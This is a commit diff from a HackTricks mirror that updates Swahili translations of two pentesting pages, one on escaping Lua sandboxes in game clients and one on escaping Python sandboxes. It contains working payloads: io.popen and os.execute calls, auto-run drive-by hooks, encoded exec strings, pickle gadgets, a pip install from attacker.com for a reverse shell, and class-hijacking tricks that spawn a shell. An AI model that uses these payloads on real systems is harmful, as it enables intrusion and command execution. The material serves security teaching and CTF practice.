maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/generic-methodologies-and-resources/python/bypass-pytho

Browse Source
This commit is contained in:
Translator 2025-09-03 11:42:06 +00:00
parent ee98552298
commit 7b93b2557e
9 changed files with 353 additions and 1852 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
src/generic-methodologies-and-resources/lua/bypass-lua-sandboxes/README.md
View File

@ -1,18 +1,18 @@
# Bypass Lua sandboxes (embedded VMs, game clients)
# Kuvuka Lua sandboxes (embedded VMs, game clients)
{{#include ../../../banners/hacktricks-training.md}}
Ukurasa huu unakusanya mbinu za vitendo za kuorodhesha na kutoroka kutoka kwa Lua "sandboxes" zilizojengwa ndani ya applications (hasa game clients, plugins, au in-app scripting engines). Injini nyingi zinaonyesha mazingira ya Lua yaliyopunguzwa, lakini hutoa globals zenye nguvu ambazo zinaweza kufikiwa na kuruhusu utekelezaji wa amri bila vizuizi au hata native memory corruption wakati bytecode loaders zinapotolewa.
Ukurasa huu unakusanya mbinu za vitendo za kuorodhesha na kuvunja kutoka kwa Lua "sandboxes" zilizowekwa ndani ya applications (hasa game clients, plugins, au in-app scripting engines). Engines nyingi zinaonyesha mazingira ya Lua yaliyodhibitiwa, lakini huacha globals zenye nguvu zikifikiwa ambazo zinawezesha utekelezaji wa amri chochote au hata uharibifu wa native memory wakati bytecode loaders zinapofichuliwa.
Mawazo muhimu:
- Tibu VM kama mazingira yasiyojulikana: orodhesha _G na ugundue ni primitives gani hatari zinaweza kufikiwa.
- Iwapo stdout/print zimezuiwa, tumia kwa ubaya chanel yoyote ya UI/IPC ndani ya VM kama output sink ili kuangalia matokeo.
- Kama io/os imefunuliwa, mara nyingi una utekelezaji wa amri moja kwa moja (io.popen, os.execute).
- Kama load/loadstring/loadfile zimetolewa, kuendesha crafted Lua bytecode kunaweza kuvunja usalama wa kumbukumbu katika baadhi ya matoleo (≤5.1 verifiers ni bypassable; 5.2 iliondoa verifier), hivyo kuwezesha advanced exploitation.
- Tumia VM kama mazingira yasiyojulikana: orodhesha _G na gundua ni dangerous primitives gani zinazoweza kufikiwa.
- Wakati stdout/print imezuiwa, tumia yoyote in-VM UI/IPC channel kama output sink ili kuona matokeo.
- Ikiwa io/os zimeonyeshwa, mara nyingi una direct command execution (io.popen, os.execute).
- Ikiwa load/loadstring/loadfile zimeonyeshwa, kutekeleza crafted Lua bytecode kunaweza kupindua memory safety katika baadhi ya toleo (≤5.1 verifiers are bypassable; 5.2 removed verifier), ikiruhusu advanced exploitation.
## Orodhesha sandboxed environment
## Enumerate the sandboxed environment
- Toa mazingira ya global ili kuorodhesha tables/functions zinazoweza kufikiwa:
- Dump the global environment to inventory reachable tables/functions:
```lua
-- Minimal _G dumper for any Lua sandbox with some output primitive `out`
local function dump_globals(out)
@ -22,7 +22,7 @@ out(tostring(k) .. " = " .. tostring(v))
end
end
```
- Ikiwa print() haipo, tumia tena in-VM channels. Mfano kutoka kwenye MMO housing script VM ambapo chat output inafanya kazi tu baada ya sound call; ifuatayo inaunda function ya output imara:
- Ikiwa print() haipatikani, tumia tena in-VM channels. Mfano kutoka kwenye MMO housing script VM ambapo chat output hufanya kazi tu baada ya sound call; yafuatayo huunda kazi ya kutoa inayoweza kuaminika:
```lua
-- Build an output channel using in-game primitives
local function ButlerOut(label)
@ -39,11 +39,11 @@ local out = ButlerOut(1)
dump_globals(out)
end
```
Boresha mtindo huu kwa lengo lako: kisanduku chochote cha maandishi, toast, logger, au UI callback kinachokubali strings kinaweza kutumika kama stdout kwa reconnaissance.
Fanya mfano huu uwe wa jumla kwa lengo lako: textbox yoyote, toast, logger, au UI callback inayokubali strings inaweza kutumika kama stdout kwa reconnaissance.
## Direct command execution if io/os is exposed
## Direct command execution ikiwa io/os imefunuliwa
Ikiwa sandbox bado inafunua maktaba za kawaida io au os, kuna uwezekano una immediate command execution:
Ikiwa sandbox bado inafichua standard libraries io au os, kuna uwezekano kwamba una immediate command execution:
```lua
-- Windows example
io.popen("calc.exe")
@ -52,25 +52,26 @@ io.popen("calc.exe")
os.execute("/usr/bin/id")
io.popen("/bin/sh -c 'id'")
```
- Utekelezaji hufanyika ndani ya client process; tabaka nyingi za anti-cheat/antidebug zinazozuia external debuggers hazitazuia in-VM process creation.
- Pia angalia: package.loadlib (arbitrary DLL/.so loading), require with native modules, LuaJIT's ffi (if present), na debug library (can raise privileges inside the VM).
Vidokezo:
- Utekelezaji hufanyika ndani ya client process; tabaka nyingi za anti-cheat/antidebug ambazo zinazuia external debuggers hazitazuia in-VM process creation.
- Pia angalia: package.loadlib (kupakia DLL/.so yoyote), require na native modules, LuaJIT's ffi (ikiwa ipo), na debug library (inaweza kuongeza idhini ndani ya VM).
## Zero-click triggers via auto-run callbacks
Ikiwa host application inatuma scripts kwa clients na VM inaonyesha auto-run hooks (e.g., OnInit/OnLoad/OnEnter), weka payload yako hapo kwa drive-by compromise mara script inapo load:
Ikiwa host application inatuma scripts kwa clients na VM inaonyesha auto-run hooks (mfano, OnInit/OnLoad/OnEnter), weka payload yako huko kwa drive-by compromise mara script inapoanza:
```lua
function OnInit()
io.popen("calc.exe") -- or any command
end
```
Any equivalent callback (OnLoad, OnEnter, etc.) inapanua mbinu hii wakati scripts zinapotumwa na kutekelezwa kwenye client kwa otomatiki.
Callback sawa yoyote (OnLoad, OnEnter, etc.) huifanya tekniki hii kuwa ya jumla wakati scripts zinapotumwa na kutekelezwa kwenye client kwa otomatiki.
## Vipengele vya msingi hatari vya kutafutwa wakati wa recon
## Viambato hatari vya kutafuta wakati wa recon
Wakati wa _G enumeration, angalia hasa kwa:
Wakati wa kuorodhesha _G, tazama hasa kwa:
- io, os: io.popen, os.execute, file I/O, env access.
- load, loadstring, loadfile, dofile: tekeleza source au bytecode; inaunga mkono kupakia bytecode zisizo za kuaminika.
- package, package.loadlib, require: kupakia maktaba za dynamic na uso wa module.
- load, loadstring, loadfile, dofile: kutekeleza source au bytecode; inaunga mkono kupakia bytecode isiyothibitishwa.
- package, package.loadlib, require: upakiaji wa dynamic library na uso wa module.
- debug: setfenv/getfenv (≤5.1), getupvalue/setupvalue, getinfo, na hooks.
- LuaJIT-only: ffi.cdef, ffi.load kwa kuita native code moja kwa moja.
@ -89,22 +90,22 @@ print(g())
local mylib = package.loadlib("./libfoo.so", "luaopen_foo")
local foo = mylib()
```
## Upandishaji wa hiari: abusing Lua bytecode loaders
## Kupandisha hiari: kutumia vibaya Lua bytecode loaders
Wakati load/loadstring/loadfile zinapatikana lakini io/os zimezuiliwa, utekelezaji wa crafted Lua bytecode unaweza kusababisha ufichuzi wa memory na primitives za corruption. Mambo muhimu:
- Lua ≤ 5.1 ilikuja na bytecode verifier ambayo ina bypasses zinazoeleweka.
- Lua 5.2 iliondoa verifier kabisa (msimamo rasmi: applications zinapaswa kukataa precompiled chunks), ikipanua attack surface ikiwa bytecode loading haijazuiwa.
- Workflows kwa kawaida: leak pointers kupitia in-VM output, tengeneza bytecode kuunda type confusions (kwa mfano, kuhusiana na FORLOOP au opcodes nyingine), kisha pinda hadi arbitrary read/write au native code execution.
Wakati load/loadstring/loadfile zinapatikana lakini io/os zimepunguzwa, utekelezaji wa crafted Lua bytecode unaweza kusababisha memory disclosure na corruption primitives. Mambo muhimu:
- Lua ≤ 5.1 ililetwa na bytecode verifier yenye bypasses zinazojulikana.
- Lua 5.2 ilitoa verifier kabisa (msimamo rasmi: applications zinapaswa kukataa tu precompiled chunks), ikipanua attack surface ikiwa bytecode loading haifungwi.
- Workflows kawaida: leak pointers via in-VM output, craft bytecode kuunda type confusions (mf., karibu na FORLOOP au opcodes nyingine), kisha pivot kwa arbitrary read/write au native code execution.
Njia hii ni engine/version-specific na inahitaji RE. Angalia references kwa uchambuzi wa kina, exploitation primitives, na mifano ya gadgetry katika games.
Njia hii ni engine/version-specific na inahitaji RE. Angalia references kwa deep dives, exploitation primitives, na mifano ya gadgetry katika games.
## Detection and hardening notes (for defenders)
## Vidokezo vya ugunduzi na ugumu (kwa watetezi)
- Server side: reject or rewrite user scripts; allowlist safe APIs; strip or bind-empty io, os, load/loadstring/loadfile/dofile, package.loadlib, debug, ffi.
- Client side: run Lua with a minimal _ENV, forbid bytecode loading, reintroduce a strict bytecode verifier or signature checks, and block process creation from the client process.
- Telemetry: alert on gameclient → child process creation shortly after script load; correlate with UI/chat/script events.
- Upande wa server: kataa au andika upya user scripts; allowlist safe APIs; ondoa au bind-empty io, os, load/loadstring/loadfile/dofile, package.loadlib, debug, ffi.
- Upande wa client: endesha Lua na minimal _ENV, kataza bytecode loading, reintroduce strict bytecode verifier au signature checks, na zuia process creation kutoka client process.
- Telemetry: toa alert juu ya gameclient → child process creation muda mfupi baada ya script load; linganisha na matukio ya UI/chat/script.
## References
## Marejeo
- [This House is Haunted: a decade old RCE in the AION client (housing Lua VM)](https://appsec.space/posts/aion-housing-exploit/)
- [Bytecode Breakdown: Unraveling Factorio's Lua Security Flaws](https://memorycorruption.net/posts/rce-lua-factorio/)

179
src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
View File

@ -1,12 +1,13 @@
# Bypass Python sandboxes
# Kuepuka Python sandboxes
{{#include ../../../banners/hacktricks-training.md}}
Hizi ni baadhi ya mbinu za bypass python sandbox ili kutekeleza amri yoyote.
Hizi ni baadhi ya mbinu za kuepuka ulinzi wa Python sandboxes na kutekeleza amri za aina yoyote.
## Maktaba za Utekelezaji wa Amri
Jambo la kwanza unalopaswa kujua ni kama unaweza kutekeleza code moja kwa moja na library iliyokuwa imeingizwa, au kama unaweza kuingiza yoyote ya libraries hizi:
## Maktaba za utekelezaji wa amri
Jambo la kwanza unalotakiwa kujua ni kama unaweza kutekeleza moja kwa moja code kwa kutumia library ambazo tayari zimeimport, au kama unaweza import yoyote ya libraries hizi:
```python
os.system("ls")
os.popen("ls").read()
@ -39,11 +40,11 @@ open('/var/www/html/input', 'w').write('123')
execfile('/usr/lib/python2.7/os.py')
system('ls')
```
Kumbuka kwamba _**open**_ na _**read**_ functions zinaweza kuwa muhimu kwa **kusoma faili** ndani ya python sandbox na kwa **kuandika baadhi ya code** ambayo unaweza **execute** ili **bypass** sandbox.
Kumbuka kwamba _**open**_ na _**read**_ functions zinaweza kuwa muhimu kusoma files ndani ya python sandbox na kuandika baadhi ya code ambayo unaweza execute ili bypass sandbox.
> [!CAUTION] > **Python2 input()** function inaruhusu kutekeleza python code kabla ya programu kutatoka kosa.
> [!CAUTION] > **Python2 input()** function inaruhusu kuendesha python code kabla programu inapofungwa kwa ghafla.
Python inajaribu **kupakia libraries kutoka directory ya sasa kwanza** (amri ifuatayo itaonyesha wapi python inavyopakia modules kutoka): `python3 -c 'import sys; print(sys.path)'`
Python hujaribu **load libraries kutoka current directory kwanza** (amri ifuatayo itaonyesha wapi python inavyopakia modules kutoka): `python3 -c 'import sys; print(sys.path)'`
![](<../../../images/image (559).png>)
@ -52,8 +53,8 @@ Python inajaribu **kupakia libraries kutoka directory ya sasa kwanza** (amri ifu
### Default packages
Unaweza kupata **list of pre-installed** packages hapa: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Kumbuka kwamba kutoka kwa pickle unaweza kufanya python env **import arbitrary libraries** zilizowekwa kwenye system.\
Kwa mfano, pickle ifuatayo, itakapopakiwa, itaimport library ya pip ili kuitumia:
Kumbuka kwamba kutoka pickle unaweza kufanya python env **import arbitrary libraries** zilizowekwa kwenye mfumo.\
Kwa mfano, pickle ifuatayo, inapoload, itafanya import pip library ili kuitumia:
```python
#Note that here we are importing the pip library so the pickle is created correctly
#however, the victim doesn't even need to have the library installed to execute it
@ -66,7 +67,7 @@ return (pip.main,(["list"],))
print(base64.b64encode(pickle.dumps(P(), protocol=0)))
```
Kwa maelezo zaidi kuhusu jinsi pickle inavyofanya kazi, angalia hii: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
Kwa maelezo zaidi kuhusu jinsi pickle inavyofanya kazi, angalia: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
### Pip package
@ -77,21 +78,21 @@ Ikiwa una ufikiaji wa `pip` au `pip.main()` unaweza kusakinisha package yoyote n
pip install http://attacker.com/Rerverse.tar.gz
pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
```
Unaweza kupakua kifurushi kinachounda reverse shell hapa. Tafadhali kumbuka kabla ya kutumia unapaswa **kuifungua (decompress), kubadilisha `setup.py`, na kuweka IP yako kwa reverse shell**:
Unaweza kupakua paketi ya kuunda reverse shell hapa. Tafadhali kumbuka kwamba kabla ya kuitumia unapaswa **kuifungua, kubadilisha `setup.py`, na kuweka IP yako kwa reverse shell**:
{{#file}}
Reverse.tar (1).gz
{{#endfile}}
> [!TIP]
> Kifurushi hiki kinaitwa `Reverse`. Hata hivyo, kilitengenezwa maalum ili unapotoka kwenye reverse shell, sehemu nyingine ya usakinishaji itashindwa, hivyo **hautakuwa unaacha kifurushi chochote cha ziada cha python kimewekwa kwenye server** utakapoondoka.
> Paketi hii inaitwa `Reverse`. Hata hivyo, ilitengenezwa mahsusi ili unapotoka kwenye reverse shell, mwendelezo wa usakinishaji utashindwa, kwa hivyo **you won't leave any extra python package installed on the server** unapoondoka.
## Ku-eval code ya python
## Eval-ing python code
> [!WARNING]
> Kumbuka kwamba exec inaruhusu multiline strings na ";", lakini eval haiwezi (angalia walrus operator)
> Kumbuka kuwa exec inaruhusu multiline strings na ";", lakini eval haiaruhusu (angalia walrus operator)
Kama herufi fulani zimezuiliwa, unaweza kutumia uwakilishi wa **hex/octal/B64** ili **bypass** kizuizi:
Ikiwa herufi fulani zimezuiwa unaweza kutumia uwakilishi wa **hex/octal/B64** ili **bypass** kizuizi:
```python
exec("print('RCE'); __import__('os').system('ls')") #Using ";"
exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"
@ -112,7 +113,7 @@ exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
```
### Maktaba nyingine ambazo zinaruhusu eval python code
### Maktaba nyingine zinazowezesha eval python code
```python
#Pandas
import pandas as pd
@ -126,15 +127,15 @@ df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')")
# Like:
df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')")
```
Pia angalia sandboxed evaluator escape ya ulimwengu halisi katika PDF generators:
Pia angalia kutoroka kwa evaluator uliowekwa ndani ya sandbox katika watengenezaji wa PDF:
- ReportLab/xhtml2pdf triple-bracket [[[...]]] expression evaluation → RCE (CVE-2023-33733). Inatumia rl_safe_eval kufikia function.__globals__ na os.system kutoka kwa attributes zilizotathminiwa (kwa mfano, font color) na inarudisha thamani halali ili rendering iendelee bila matatizo.
- ReportLab/xhtml2pdf triple-bracket [[[...]]] expression evaluation → RCE (CVE-2023-33733). Inaitumia rl_safe_eval kufikia function.__globals__ na os.system kupitia sifa zilizothaminiwa (kwa mfano, rangi ya fonti) na kurejesha thamani halali ili kuweka uonyeshaji thabiti.
{{#ref}}
reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
{{#endref}}
## Operators na mbinu fupi
## Operatori na mbinu fupi
```python
# walrus operator allows generating variable inside a list
## everything will be executed in order
@ -143,9 +144,9 @@ reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"
```
## Kupita ulinzi kwa kutumia kodisho (UTF-7)
## Kuvuka ulinzi kupitia kodishaji (UFT-7)
Katika [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 imetumika kupakia na kutekeleza arbitrary python code ndani ya sandbox inayoonekana:
Katika [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 imetumika kupakia na kutekeleza arbitrary python code ndani ya apparent sandbox:
```python
assert b"+AAo-".decode("utf_7") == "\n"
@ -156,13 +157,13 @@ return x
#+AAo-print(open("/flag.txt").read())
""".lstrip()
```
Ni pia inawezekana kuikwepa kwa kutumia kodishaji nyingine, kwa mfano `raw_unicode_escape` na `unicode_escape`.
Pia inawezekana kuibypass kwa kutumia encodings nyingine, kwa mfano `raw_unicode_escape` na `unicode_escape`.
## Utekelezaji wa Python bila miito
## Utekelezaji wa Python bila kuwaita
Ikiwa uko ndani ya python jail ambayo **doesn't allow you to make calls**, bado kuna njia kadhaa za **execute arbitrary functions, code** na **commands**.
Ikiwa uko ndani ya python jail ambayo **haitakuwezesha kufanya calls**, bado kuna njia kadhaa za **execute arbitrary functions, code** na **commands**.
### RCE with [decorators](https://docs.python.org/3/glossary.html#term-decorator)
### RCE na [decorators](https://docs.python.org/3/glossary.html#term-decorator)
```python
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
@exec
@ -184,13 +185,13 @@ X = exec(X)
@'__import__("os").system("sh")'.format
class _:pass
```
### RCE creating objects and overloading
### RCE kuunda objects na overloading
Ikiwa unaweza **declare a class** na **create an object** ya class hiyo, unaweza **write/overwrite different methods** ambazo zinaweza **triggered** **without** **needing to call them directly**.
Kama unaweza **declare a class** na **create an object** ya class hiyo, unaweza **write/overwrite different methods** ambazo zinaweza **triggered** bila ya kuhitaji kuziita moja kwa moja.
#### RCE with custom classes
#### RCE na custom classes
Unaweza kubadilisha baadhi ya **class methods** (_by overwriting existing class methods or creating a new class_) ili kuzifanya **execute arbitrary code** wakati zinapokuwa **triggered** bila kuzawaita moja kwa moja.
Unaweza kubadilisha baadhi ya **class methods** (_by overwriting existing class methods or creating a new class_) ili kuzifanya **execute arbitrary code** wakati zinapotumika (**triggered**) bila kuziita moja kwa moja.
```python
# This class has 3 different ways to trigger RCE without directly calling any function
class RCE:
@ -242,7 +243,7 @@ __ixor__ (k ^= 'import os; os.system("sh")')
```
#### Kuunda vitu kwa [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses)
Jambo kuu ambalo metaclasses zinaturuhusu kufanya ni **kutengeneza mfano wa darasa, bila kuitisha constructor** moja kwa moja, kwa kuunda darasa jipya lenye darasa linalolengwa kama metaclass.
Kitu muhimu ambacho metaclasses zinaturuhusu kufanya ni **kuunda mfano wa darasa, bila kuita constructor** moja kwa moja, kwa kuunda darasa jipya lenye darasa lengwa kama metaclass.
```python
# Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed
# This will define the members of the "subclass"
@ -259,7 +260,7 @@ Sub['import os; os.system("sh")']
```
#### Kuunda objects kwa exceptions
Wakati **exception is triggered** object ya **Exception** inaundwa bila wewe kuhitaji kuita constructor moja kwa moja (njia kutoka kwa [**@\_nag0mez**](https://mobile.twitter.com/_nag0mez)):
Wakati **exception inachochewa** object ya **Exception** **huundwa** bila wewe kuhitaji kuita constructor moja kwa moja (triki kutoka kwa [**@_nag0mez**](https://mobile.twitter.com/_nag0mez)):
```python
class RCE(Exception):
def __init__(self):
@ -301,7 +302,7 @@ __iadd__ = eval
__builtins__.__import__ = X
{}[1337]
```
### Soma faili na msaada wa builtins & leseni
### Soma faili yenye msaada wa builtins & leseni
```python
__builtins__.__dict__["license"]._Printer__filenames=["flag"]
a = __builtins__.help
@ -315,17 +316,17 @@ pass
- [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
- [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
Ikiwa unaweza kupata kitu **`__builtins__`** unaweza kufanya import ya maktaba (kumbuka kwamba unaweza pia kutumia hapa uwakilishi mwingine wa string ulioonyeshwa katika sehemu ya mwisho):
Ikiwa unaweza kufikia kitu **`__builtins__`** unaweza kuingiza maktaba (kumbuka kwamba unaweza pia kutumia hapa uwakilishi mwingine wa string ulioonyeshwa katika sehemu ya mwisho):
```python
__builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls")
```
### Hakuna Builtins
Unapokuwa huna `__builtins__` hutaweza ku-import chochote wala hata kusoma au kuandika mafaili kwa sababu **kazi zote za globali** (kama `open`, `import`, `print`...) **hazijapakiwa**.\
Hata hivyo, **kwa chaguo-msingi python hu-import moduli nyingi kwenye kumbukumbu**. Moduli hizi zinaweza kuonekana salama, lakini baadhi yao pia huleta sifa hatarishi ndani yao ambazo zinaweza kufikiwa ili kupata hata **arbitrary code execution**.
Unapokosa `__builtins__` hutaweza ku-import chochote wala hata kusoma au kuandika faili kwa sababu **kazi zote za global** (kama `open`, `import`, `print`...) **hazijapakiwa**.\
Hata hivyo, **kwa chaguo-msingi python hu-import moduli nyingi kwenye kumbukumbu**. Moduli hizi zinaweza kuonekana zisizo hatari, lakini baadhi yao pia huingiza vipengele hatarishi ndani yao ambavyo vinaweza kufikiwa ili kupata hata arbitrary code execution.
Katika mifano ifuatayo unaweza kuona jinsi ya **kutumia vibaya** baadhi ya moduli hizi “**salama**” zilizopakiwa ili **kupata** **sifa** **hatarishi** ndani yao.
Katika mifano ifuatayo unaweza kuona jinsi ya **kutumia vibaya** baadhi ya moduli hizi "**benign**" zilizopakiwa ili **kupata** **vipengele** **hatarishi** ndani yao.
**Python2**
```python
@ -367,9 +368,9 @@ get_flag.__globals__['__builtins__']
# Get builtins from loaded classes
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]
```
[**Chini kuna function kubwa zaidi**](#recursive-search-of-builtins-globals) ili kupata kumi/**mia** ya **maeneo** ambapo unaweza kupata **builtins**.
[**Hapo chini kuna function kubwa zaidi**](#recursive-search-of-builtins-globals) ili kupata makumi/**mamia** ya **maeneo** ambapo unaweza kupata **builtins**.
#### Python2 na Python3
#### Python2 and Python3
```python
# Recover __builtins__ and make everything easier
__builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__
@ -383,7 +384,7 @@ __builtins__["__import__"]("os").system("ls")
# There are lots of other payloads that can be abused to execute commands
# See them below
```
## Globals and locals
## Globals na locals
Kukagua **`globals`** na **`locals`** ni njia nzuri ya kujua unachoweza kufikia.
```python
@ -409,15 +410,15 @@ class_obj.__init__.__globals__
[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]
```
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) to find kumi/**mia** ya **places** ambapo unaweza kupata **globals**.
[**Below there is a bigger function**](#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
## Gundua Arbitrary Execution
## Gundua Utekelezaji wa Hiari
Hapa nataka kuelezea jinsi ya kugundua kwa urahisi **more dangerous functionalities loaded** na kupendekeza exploits zenye kuaminika zaidi.
#### Kufikia subclasses kwa bypasses
#### Kupata subclasses kwa kutumia bypasses
Mojawapo ya sehemu nyeti zaidi za mbinu hii ni uwezo wa **access the base subclasses**. Katika mifano iliyopita hili lilifanywa kwa kutumia `''.__class__.__base__.__subclasses__()` lakini kuna **njia nyingine zinazowezekana**:
Moja ya sehemu nyeti zaidi za mbinu hii ni kuwa na uwezo wa **access the base subclasses**. Katika mifano iliyopita hii ilifanywa kwa kutumia `''.__class__.__base__.__subclasses__()` lakini kuna **njia nyingine zinazowezekana**:
```python
#You can access the base from mostly anywhere (in regular conditions)
"".__class__.__base__.__subclasses__()
@ -445,18 +446,18 @@ defined_func.__class__.__base__.__subclasses__()
(''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
```
### Kupata maktaba hatari zilizopakiwa
### Kutafuta libraries hatari zilizopakiwa
Kwa mfano, ukijua kuwa kwa maktaba **`sys`** inawezekana **kuingiza maktaba yoyote**, unaweza kutafuta **moduli zote zilizopakiwa ambazo ziliingiza sys ndani yao**:
Kwa mfano, ukijua kwamba kwa library **`sys`** inawezekana **import arbitrary libraries**, unaweza kutafuta modules zote loaded ambazo zimeimport sys ndani yao:
```python
[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]
['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']
```
Kuna nyingi, na **tunahitaji mmoja tu** kutekeleza amri:
Kuna nyingi, na **tunahitaji moja tu** kutekeleza amri:
```python
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
```
Tunaweza kufanya kitu kile kile na **other libraries** ambazo tunazijua zinaweza kutumika **execute commands**:
Tunaweza kufanya kitu kilekile na **maktaba nyingine** ambazo tunajua zinaweza kutumika **kuendesha amri**:
```python
#os
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")
